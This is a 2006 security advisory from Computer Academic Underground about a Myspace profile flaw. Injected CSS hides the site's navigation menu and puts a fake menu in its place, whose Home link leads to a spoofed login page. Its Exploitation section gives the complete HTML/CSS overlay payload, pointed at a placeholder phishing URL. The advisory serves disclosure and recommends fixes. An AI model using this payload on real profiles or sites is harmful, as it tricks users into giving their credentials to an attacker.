Home / vulnerabilitiesPDF  

CAU-2006-0001.txt

Posted on 19 November 2006
Source : packetstormsecurity.org Link

 

____ ____ __ __
/ / | | | |
----====####/ /\__##/ / ##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======###### / /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/

Computer Academic Underground
http://www.caughq.org
Security Advisory

===============/========================================================
Advisory ID: CAU-2006-0001
Release Date: 11/16/2006
Title: Myspace.com Trojaned Navigation Menu
Application/OS: Myspace.com Website
Topic: Myspace.com's navigation menu can be replaced with a
malicious menu via CSS code in the attacker's profile.
Vendor Status: Not Notified
Attributes: Remote, Passive
Advisory URL: http://www.caughq.org/advisories/CAU-2006-0001.txt
Author/Email: int3l <int3l (at) caughq.org>
I)ruid <druid (at) caughq.org>
===============/========================================================

Overview
========

Myspace.com provides a site navigation menu near the top of every page.
Users generally use this menu to navigate to the various areas of the
website. The first link that the menu provides is called "Home" which
navigates back to the user's personalized Myspace page which is
essentially the user's "home base" when using the site. As such this
particular link is used quite frequently and is used to return from
other areas of the website, most importantly from other user's profile
pages.

A content-replacement attack coupled with a spoofed Myspace login page
can be used to collect victim users' authentication credentials. By
replacing the navigation menu on the attacker's Myspace profile page,
an unsuspecting victim may be redirected to an external site of the
attacker's choice, such as a spoofed Myspace login page. Due to
Myspace.com's seemingly random tendency to expire user sessions or log
users out, a user being presented with the Myspace login page is not
out of the ordinary and does not raise much suspicion on the part of
the victim.


Impact
======

Users are unexpectedly redirected to a website of the attacker's
choice.

Users may be tricked into revealing their authentication credentials.


Affected Systems
================

Myspace.com: http://www.myspace.com


Technical Explanation
=====================

The following CSS code can be submitted to a user profile's "About Me"
section which will cause the Myspace navigation menu not to be
displayed:

<style type="text/css">
div table td font {display: none;}
</style>

This allows the attacker to replace it with a malicious navigation menu
which may redirect users to an external site spoofing the Myspace login
page. If the user is successfully tricked into believing that they must
re-authenticate, they will inadvertently reveal their authentication
credentials to the attacker.


Solution & Recommendations
==========================

Myspace should not allow users to add CSS code to their profiles via the
update profile form. This restriction can be accomplished by rejecting
such submissions or stripping the code out of the form input when
submitted.

Users should always be aware of the URL information in their browser.

As a temporary work-around, users should not use the navigation bars
while viewing an untrusted user's Myspace profile.


Exploitation
============

Place this code in the "About Me" section of the attacker's Myspace
profile:

<style type="text/css">
div table td font {display: none;}
</style>

<div style="z-index:5; background-color:000000; position:absolute; top:125px; left:50%; margin-left:-395px; width:790px; height:15px;" align="center"><font color=><b></b></font><br>

<a href="http://www.example.com/login.html" target=""><font color=ffffff>Home</font></a>
<font color=ff0099> |</font>

<a href="http://browseusers.myspace.com/browse/browse.aspx?" target=""><font color=ffffff>Browse</font></a>
<font color=ff0099> |</font>

<a href="http://search.myspace.com/index.cfm?fuseaction=find" target=""><font color=ffffff>Search</font></a>
<font color=ff0099> |</font>

<a href="http://invite.myspace.com/index.cfm?fuseaction=invite" target=""><font color=ffffff>Invite</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=film" target=""><font color=ffffff>Film</font></a>
<font color=ff0099> |</font>

<a href="http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox" target=""><font color=ffffff>Mail</font></a>
<font color=ff0099> |</font>

<a href="http://blog.myspace.com/index.cfm?fuseaction=blog.controlcenter" target=""><font color=ffffff>Blog</font></a>
<font color=ff0099> |</font>

<a href="http://favorites.myspace.com/index.cfm?fuseaction=user.favorites" target=""><font color=ffffff>Favorites</font></a>
<font color=ff0099> |</font>

<a href="http://forum.myspace.com/index.cfm?fuseaction=messageboard.categories" target=""><font color=ffffff>Forum</font></a>
<font color=ff0099> |</font>

<a href="http://groups.myspace.com/index.cfm?fuseaction=groups.categories" target=""><font color=ffffff>Groups</font></a>
<font color=ff0099> |</font>

<a href="http://events.myspace.com/index.cfm?fuseaction=events" target=""><font color=ffffff>Events</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=vids" target=""><font color=ffffff>Videos</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=music" target=""><font color=ffffff>Music</font></a>
<font color=ff0099> |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=comedian.home" target=""><font color=ffffff>Comedy</font></a>
<font color=ff0099> |</font>

<a href="http://classifieds.myspace.com/index.cfm?fuseaction=classifieds" target=""><font color=ffffff>Classifieds</font></a>
</div><style type="text/css">div div table tr td a.navbar, div div table tr td font {display: none;}</style>


References
==========

Myspace.com: http://www.myspace.com


Credits & Gr33ts
================

CAU



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 

TOP